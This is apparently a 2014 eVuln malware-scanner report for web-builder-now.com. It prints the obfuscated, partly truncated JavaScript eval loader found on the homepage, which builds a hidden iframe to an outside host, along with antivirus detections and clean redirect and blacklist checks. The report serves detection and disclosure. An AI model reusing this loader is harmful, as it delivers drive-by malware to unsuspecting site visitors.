New scan:

Malware Scanner report for web-builder-now.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://web-builder-now.com/
200 OK
Content-Length: 11618
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,6d,7a,74,7c,74,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,66,67,63,70,69,74,7c,67,6e,63,6d,30,65,71,6f,31,79,72,2f,6b,70,65,6e,77,66,67,75,31,74,67,6e,30,72,6a,72,29,3d,f,c,22,22,22,22,6d,7a,74,7c,74,30,75,76,7b,6e,67,30,72,71,75,
... 3370 bytes are skipped ...
3,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f\".split(\",\");for(i=0;i<a.length;i++){a[i]=parseInt(a[i],16)-(5-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window.document)eval(ss.fromCharCode.apply(ss,a));

Antivirus reports:

Avast
JS:Decode-AAV [Trj]
Ikarus
Trojan.HTML.Agent
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:JS/Colkit.B
GData
JS:Decode-AAV

http://web-builder-now.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: web-builder-now.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 10:52:45 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Pingback: http://1072027940.test.prositehosting.co.uk/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-builder-now.com
Referer: http://www.google.com/search?q=web-builder-now.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=web-builder-now.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-builder-now.com/

Result: web-builder-now.com is not infected or malware details are not published yet.